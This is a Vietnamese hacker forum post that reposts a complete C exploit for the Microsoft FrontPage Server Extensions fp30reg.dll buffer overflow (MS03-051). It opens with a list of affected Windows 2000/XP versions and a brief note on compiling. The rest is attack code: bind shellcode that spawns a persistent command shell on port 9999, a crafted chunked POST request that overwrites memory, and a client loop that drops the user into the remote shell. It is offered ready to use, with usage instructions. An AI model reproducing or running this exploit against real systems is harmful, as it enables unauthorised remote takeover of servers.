Hacker
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


Forum Hacker Viet Nam
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập

 

 Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerability

Go down 
Tác giảThông điệp
hackervn1992

hackervn1992


Tổng số bài gửi : 200
Join date : 22/10/2010

Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerability Empty
Bài gửiTiêu đề: Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerability   Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerability EmptySat Oct 23, 2010 5:26 pm

Phiên bản ảnh hưởng:

vulnerable Microsoft FrontPage Server Extensions 2000
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Advanced Server SP3
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Datacenter Server SP3
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional SP2
+ Microsoft Windows 2000 Professional SP3
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server SP2
+ Microsoft Windows 2000 Server SP3
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional SP1
Microsoft FrontPage Server Extensions 2002
Microsoft SharePoint Team Services 2002
+ Microsoft Office XP SP1
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional SP1


2. Code khai thác :

complite with winshock.h và vài thủ thuật nhỏ


/*******************************************************************************

Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore

Exploit by Adik < netmaniac [at] hotmail.kg >

Binds persistent command shell on port 9999
Tested on
Windows 2000 Professional SP3 English version
(fp30reg.dll ver 4.0.2.5526)

Greetingz/Salamchiki: fellaz in Bishkek - r0ach,acha,horsemoon Smile

-[ 13/Nov/2003 ]-
********************************************************************************/


#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

#define VER "0.1"

/******** bind shellcode spawns persistent shell on port 9999 *****************************/
unsigned char kyrgyz_bind_code[] = {
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};

void cmdshell (int sock);
long gimmeip(char *hostname);

int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
struct hostent *host;
int sockTCP,s;
unsigned short port = 80;
long ip;
unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
unsigned char packet[3000],data[1500];
unsigned char ecx[] = "\xe0\xf3\xd4\x67";
unsigned char edi[] = "\xff\xd0\x90\x90";
unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll
unsigned char shortjmp[] = "\xeb\x10";

printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
" by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER);
if(argc < 2)
{

printf(" Usage: %s [Target] <port>\n"
" eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);
return 1;
}
if(argc==3)
port = atoi(argv[2]);
WSAStartup(0x0202, &wsaData);
printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port);
ip=gimmeip(argv[1]);
memset(&targetTCP, 0, sizeof(targetTCP));
memset(packet,0,sizeof(packet));
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]);
memset(data, 0x90, sizeof(data)-1);
data[sizeof(data)-1] = '\x0';
memcpy(&data[16],edi,sizeof(edi)-1);
memcpy(&data[20],ecx,sizeof(ecx)-1);
memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
memcpy(&data[250+14],call,sizeof(call)-1);
memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized...\n");
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Checking for presence of fp30reg.dll...");
if (send(sockTCP, packet, strlen(packet),0) == -1)
{
printf("[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}
memset(packet,0,sizeof(packet));
if (recv(sockTCP, packet, sizeof(packet),0) == -1)
{
printf("[x] Failed to receive packet! Exiting...\n");
WSACleanup();
return 1;
}
if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
printf(" Found!\n");
else
{
printf(" Not Found!! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Packet injected!\n");
closesocket(sockTCP);
printf("[*] Sleeping ");
for(s=0;s<13000;s+=1000)
{
printf(". ");
Sleep(1000);
}
printf("\n[*] Connecting to host: %s on port 9999",argv[1]);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\n[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(9999);
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
WSACleanup();
exit(1);
}
printf("\n[*] Dropping to shell...\n\n");
cmdshell(sockTCP);
return 0;
}
/*********************************************************************************/
void cmdshell (int sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char buffer[1000];

tv.tv_sec = 1;
tv.tv_usec = 0;

while (1)
{
o[0] = 1;
o[1] = sock;

length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
}
else
{
length = read (0, buffer, sizeof (buffer));
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
length = send(sock, buffer, length, 0);
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
}
}

}
/*********************************************************************************/
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
WSACleanup();
exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/*********************************************************************************/


Về Đầu Trang Go down
 
Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerability
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Microsoft Workstation Service Remote Exploit
» Đôi nét về Remote Networking :
» Mysql 3.23.x/4.0.x Remote Exploit
» Lỗi của Activity Monitor 2002, remote DoS
» Lỗi của php-proxima, Remote File Access

Permissions in this forum:Bạn không có quyền trả lời bài viết
Hacker :: Security :: Hacker and Security-
Chuyển đến